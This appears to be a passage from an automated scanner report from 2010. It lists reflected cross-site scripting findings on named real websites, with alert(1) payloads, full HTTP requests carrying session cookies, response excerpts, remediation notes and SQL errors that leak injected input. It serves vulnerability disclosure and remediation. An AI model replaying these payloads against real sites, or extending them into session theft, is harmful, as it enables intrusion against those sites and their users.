cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f693'%3balert(1)//0e9f52e7f02 was submitted in the REST URL parameter 1. This input was echoed as 1f693';alert(1)//0e9f52e7f02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-surveys1f693'%3balert(1)//0e9f52e7f02/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2da2b'%3balert(1)//df5f4b87b17 was submitted in the REST URL parameter 2. This input was echoed as 2da2b';alert(1)//df5f4b87b17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-surveys/2da2b'%3balert(1)//df5f4b87b17 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b476c'%3balert(1)//af8f54c94c2 was submitted in the REST URL parameter 1. This input was echoed as b476c';alert(1)//af8f54c94c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partnersb476c'%3balert(1)//af8f54c94c2/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9b51'%3balert(1)//082c1ebca03 was submitted in the REST URL parameter 2. This input was echoed as b9b51';alert(1)//082c1ebca03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/b9b51'%3balert(1)//082c1ebca03 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51b5a'%3balert(1)//076de39721e was submitted in the REST URL parameter 1. This input was echoed as 51b5a';alert(1)//076de39721e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /51b5a'%3balert(1)//076de39721e HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a6af'%3balert(1)//643b2b45b88 was submitted in the REST URL parameter 1. This input was echoed as 5a6af';alert(1)//643b2b45b88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5a6af'%3balert(1)//643b2b45b88 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73d98'%3balert(1)//22f7c896d61 was submitted in the REST URL parameter 1. This input was echoed as 73d98';alert(1)//22f7c896d61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search73d98'%3balert(1)//22f7c896d61/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e959'%3balert(1)//6b36809a503 was submitted in the REST URL parameter 2. This input was echoed as 3e959';alert(1)//6b36809a503 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/3e959'%3balert(1)//6b36809a503 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a7ce'%3balert(1)//5d392b94a86 was submitted in the REST URL parameter 1. This input was echoed as 9a7ce';alert(1)//5d392b94a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /social-media-for-small-business9a7ce'%3balert(1)//5d392b94a86/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54e67'%3balert(1)//a31647066fb was submitted in the REST URL parameter 2. This input was echoed as 54e67';alert(1)//a31647066fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /social-media-for-small-business/54e67'%3balert(1)//a31647066fb HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 89f1c<a>d897a860f8b was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=22889f1c<a>d897a860f8b HTTP/1.1 Host: www.cornwallkiosk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 04:55:51 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1342
mysql error: [1054: Unknown column '22889f1c' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 22889f1c<a>d897a860f8b ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90d87"><script>alert(1)</script>e4b51f359b3 was submitted in the category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registerme.asp?category=Crystal+Reports90d87"><script>alert(1)</script>e4b51f359b3 HTTP/1.1 Host: www.destech.com Proxy-Connection: keep-alive Referer: http://www.destech.com/registerme.asp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDAQBRSATD=BADNOILCCKLNDAIHOGIBEOAG; __utma=149768483.809640380.1290651366.1290651366.1290651366.1; __utmc=149768483; __utmz=149768483.1290651366.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=149768483
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 04:31:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 24335 Content-Type: text/html Cache-control: private
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 88222<a>61a1b7d1c97 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=22888222<a>61a1b7d1c97 HTTP/1.1 Host: www.edmontonkiosk.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:00:06 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1335
mysql error: [1054: Unknown column 'a' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 22888222<a>61a1b7d1c97 ORDER BY name ASC") <pre align=left> &n ...[SNIP]...
2.208. http://www.eironclad.com/contact-us/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.eironclad.com
Path:
/contact-us/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd66"><script>alert(1)</script>b85dc925199 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact-us/index.php/dcd66"><script>alert(1)</script>b85dc925199 HTTP/1.1 Host: www.eironclad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=66737466.1290654051.1.1.utmgclid=CKuAnoT9uqUCFQ2e7Qoda2zJYg|utmccn=(not+set)|utmcmd=(not+set); __utma=66737466.323249853.1290654051.1290654051.1290654051.1; __utmc=66737466; __utmb=66737466;
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 03:01:54 GMT Server: Apache/2.0.54 (Fedora) X-Powered-By: PHP/5.0.4 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Us - eIRONcl ...[SNIP]... <form method="POST" action="/contact-us/index.php/dcd66"><script>alert(1)</script>b85dc925199" name="contactform"> ...[SNIP]...
2.209. http://www.fastcompany.com/1699391/what-helps-small-business-grow-its-still-email [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed74e"><script>alert(1)</script>de54ef6f2f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1699391/what-helps-small-business-grow-its-still-email?ed74e"><script>alert(1)</script>de54ef6f2f1=1 HTTP/1.1 Host: www.fastcompany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 05:27:05 GMT Server: VoxCAST X-Powered-By: PHP/5.2.4 X-Drupal-Cache: MISS Expires: Thu, 25 Nov 2010 05:48:00 GMT Last-Modified: Thu, 25 Nov 2010 05:28:00 GMT Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0 ETag: "1290662880-0" Vary: Cookie,Accept-Encoding X-Served-By: daa-www011 Content-Type: text/html; charset=utf-8 X-Cache: MISS from VoxCAST Set-Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=e7pb7oplofq6rtt1ae45d02990; expires=Sat, 18 Dec 2010 09:01:21 GMT; path=/; domain=.fastcompany.com Connection: close Content-Length: 35744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <link rel="canonical" href="/1699391/what-helps-small-business-grow-its-still-email?ed74e"><script>alert(1)</script>de54ef6f2f1=1" /> ...[SNIP]...
The value of the f request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85c5a</script><script>alert(1)</script>6077bb4736d was submitted in the f parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
